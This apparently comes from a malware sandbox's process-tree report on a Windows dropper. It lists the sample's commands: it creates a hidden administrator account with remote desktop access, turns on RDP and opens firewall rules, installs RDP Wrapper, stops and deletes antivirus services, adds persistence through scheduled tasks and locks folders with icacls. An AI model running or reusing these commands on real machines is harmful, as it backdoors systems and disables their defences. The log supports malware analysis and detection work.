        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6168
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6544
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1380
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:5292
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:6176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6312
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6828
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:6092
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1204
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:6928
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:2324
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:328
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:3740
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:776
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:5300
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:5968
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2200
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5432
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:3320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        Hide Artifacts: Hidden Users
        
        PID:5300
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:644
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:544
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5168
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4564
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:7100
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6092
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2821.tmp\2822.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:6876
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6648
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:6352
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:5540
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Updates\jFvfxe" /F
        7⤵
        
        PID:1916
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:5348
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "Updates\jFvfxe" /F
        7⤵
        
        PID:6808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:6988
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:1368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:4564
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:6612
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6832
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:1072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:6684
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1080
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:7128
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:5128
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:6772
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:4700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:7004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:4148
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:4528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:1340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:7156
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:5780
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:5152
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:5404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:5140
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:2632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:5596
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:4660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:4676
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:6660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:5872
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:6640
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:6204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:6844
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:6564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:6932
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:7040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:6992
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:6924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5176
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:4668
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:5372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:5324
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:5884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6516
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:8
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:4632
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:2932
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:6064
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:4920
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:6284
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:6208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:6740
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1648
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:6872
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:6656
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:7060
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:7008
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:7140
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:5564
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:2724
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:7156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:8
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:5436
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:5208
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:6048
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6008
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:5416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6640
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:6740
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7164
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6916
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7148
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
